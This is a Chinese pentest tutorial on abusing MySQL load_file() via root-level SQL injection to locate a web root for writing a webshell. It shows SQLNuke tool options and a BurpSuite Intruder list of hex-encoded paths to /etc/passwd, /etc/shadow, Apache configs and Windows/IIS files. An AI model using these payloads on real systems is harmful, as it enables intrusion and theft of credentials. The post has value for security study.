所有话题标签: |
0x01 前言
相信很多人在渗透测试过程中都有遇到过这种情况:一个MySQL Root高权限注入点,也具备读取和写入权限,这时只需要找到网站绝对路径就可以写入Webshell了,但如果利用所有已知方法还是找不到网站绝对路径呢?这节我将给大家介绍一款注入辅助工具和BurpSuite利用方式。
0x02 SQLNuke工具介绍
-
https://github.com/nuke99/sqlnuke
sql.rb //主程序
config.yml //配置文件
lib/ //基础库目录
output/ //输出目录
inputs/packset.lst //字典文件
class/methods.rb //类文件
root@Jacks:~/sqlnuke-master# ./sql.rb -h
-u, --url URL Link with 'XxxX' ex: http://tar.com/?id=1+UNION+SELECT+1,XxxX,2--
-d, --data DATA POST DATA ex: id=-1+Union+Select+null,XxxX,null--&name=John
-x, --hex Hex Conversion
--proxy http://IP:PORT HTTP Proxy
--os (linux,win) Target Server OS (linux,win)
--agent AGENT User-Agent for the header
--ref REFERER Referer for the header
--cookie COOKIE Cookie for the header
-h, --help Information about commands
0x03 利用BurpSuite测试
-
http://wiki.apache.org/httpd/DistrosDefaultLayout
-
BurpSuite->Intruder->Payloads->Payload Processing->Add->Encode(Encode as ASCII hex)
0x2F6574632F706173737764
0x2F6574632F736861646F77
0x2F6574632F67726F7570
0x2F6574632F686F737473
0x2F6574632F617061636865322F6C6F67732F6163636573732E6C6F67
0x2F6574632F68747470642F6163636573732E6C6F67
0x2F6574632F696E69742E642F6170616368652F68747470642E636F6E66
0x2F6574632F696E69742E642F617061636865322F68747470642E636F6E66
0x2F7573722F6C6F63616C2F617061636865322F636F6E662F68747470642E636F6E66
0x2F7573722F6C6F63616C2F6170616368652F636F6E662F68747470642E636F6E66
0x2F686F6D652F6170616368652F68747470642E636F6E66
0x2F686F6D652F6170616368652F636F6E662F68747470642E636F6E66
0x2F6F70742F6170616368652F636F6E662F68747470642E636F6E66
0x2F6574632F68747470642F68747470642E636F6E66
0x2F6574632F68747470642F636F6E662F68747470642E636F6E66
0x2F6574632F6170616368652F6170616368652E636F6E66
0x2F6574632F6170616368652F68747470642E636F6E66
0x2F6574632F617061636865322F617061636865322E636F6E66
0x2F6574632F617061636865322F68747470642E636F6E66
0x2F7573722F6C6F63616C2F617061636865322F636F6E662F68747470642E636F6E66
0x433A5C626F6F742E696E69
0x433a5c77616d705c62696e5c6170616368655c6c6f67735c6163636573732e6c6f67
0x433a5c77616d705c62696e5c6d7973716c5c6d7973716c352e352e32345c77616d707365727665722e636f6e66
0x433a5c77616d705c62696e5c6170616368655c617061636865322e322e32325c636f6e665c68747470642e636f6e66
0x433a5c77616d705c62696e5c6170616368655c617061636865322e322e32325c636f6e665c77616d707365727665722e636f6e66
0x433a5c70687053747564795c4170616368655c636f6e665c68747470642e636f6e66
0x433a5c77696e646f77735c73797374656d33325c696e65747372765c4d657461426173652e786d6c
本文始发于微信公众号(潇湘信安):MySQL注入Load_File()函数应用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论